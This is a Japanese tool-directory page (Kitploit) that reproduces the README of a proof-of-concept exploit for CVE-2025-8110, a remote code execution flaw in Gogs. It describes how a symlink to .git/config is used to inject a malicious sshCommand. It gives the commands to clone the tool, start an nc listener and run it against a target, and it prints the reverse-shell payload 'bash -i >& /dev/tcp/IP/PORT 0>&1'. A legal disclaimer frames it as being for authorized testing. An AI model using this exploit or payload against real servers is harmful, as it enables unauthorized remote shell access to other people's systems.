Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-8110 — CVE-2025-8110 用の概念実証エクスプロイト。シンボリックリンクを介したパストラバーサルと sshCommand インジェクションを悪用してリバースシェルを取得する、Gogs の RCE 脆弱性です。 | Kitploit
ツール/GitHubGitHub/ghxstsec/cve-2025-8110
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストレッドチーミングペイロード開発
GitHubghxstsec/cve-2025-8110

CVE-2025-8110

CVE-2025-8110 用の概念実証エクスプロイト。シンボリックリンクを介したパストラバーサルと sshCommand インジェクションを悪用してリバースシェルを取得する、Gogs の RCE 脆弱性です。

リポジトリを見る
534ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Gogs RCE エクスプロイト (CVE-2025-8110)

Python License Expertise

CVE-2025-8110 の概念実証 (PoC) です。Gogs における重大な脆弱性で、シンボリックリンクのバイパスと sshCommand インジェクションを介した .git/config の操作により、リモートコード実行 (RCE) を可能にします。

📖 概要

このエクスプロイトは、Gogs API のコンテンツ管理におけるパストラバーサルの脆弱性を標的とします。認証されたユーザーは以下を実行できます。

  1. リポジトリを作成し、内部の .git/config を指す シンボリックリンク をプッシュします。
  2. API を使用して、シンボリックリンク経由で対象の設定ファイルを上書きします。
  3. 悪意のある sshCommand を注入して、サーバーが Git 操作を実行する際に リバースシェル を実行します。

🚀 特徴

  • 自動化されたワークフロー: ログイン、リポジトリ作成、シンボリックリンク展開、ポイズニングを処理します。
  • 堅牢なエンコーディング: 資格情報を自動的に URL エンコードし、特殊文字 (例: !, @) を処理します。
  • リッチな出力: Rich ライブラリを使用した視認性の高いロギング。

🛠 前提条件

  • Python 3.12+
  • ローカルシステムに Git がインストールされていること。
  • ターゲットの Gogs インスタンスで有効な資格情報。

📦 インストール

  1. リポジトリをクローンします:
    root@kitploit:~
    git clone https://github.com/Ghxstsec/CVE-2025-8110.git
    cd CVE-2025-8110
    

依存関係をインストールします:

root@kitploit:~
pip3 install -r requirements.txt

💻 使用方法

リスナーを起動します:

root@kitploit:~
nc -lvnp 6666

エクスプロイトを実行します:

root@kitploit:~
python3 CVE-2025-8110-RCE.py -u [http://target-gogs.htb:3000](http://target-gogs.htb:3000) -lh <YOUR_IP> -lp 6666 -p 'YourPassword123!'

引数:

脆弱性の核心:

root@kitploit:~
sshCommand = bash -c 'bash -i >& /dev/tcp/IP/PORT 0>&1' #

Gogs がネットワーク転送を必要とする Git コマンド (ミラー同期や内部参照チェックなど) を実行すると、sshCommand が呼び出され、リバースシェルが起動します。

⚠️ 法的免責事項: このツールは教育目的および許可されたセキュリティテスト専用です。作者は、このスクリプトによって引き起こされた誤用や損害について一切責任を負いません。コンピュータシステムへの不正アクセスは違法です。

ツールをダウンロード
引数説明
-u, --urlターゲットの Gogs インスタンスのベース URL (例: http://target.htb:3000)。
-lh, --hostリバースシェルが接続してくる攻撃者の IP (LHOST)。
-lp, --portあなたのマシンで設定するリスナーポート (LPORT)。
-p, --password認証に使用する pwnuser アカウントのパスワード。
-x, --proxy(任意) ローカルプロキシ経由でトラフィックをルーティングします (デフォルト: http://localhost:8080)。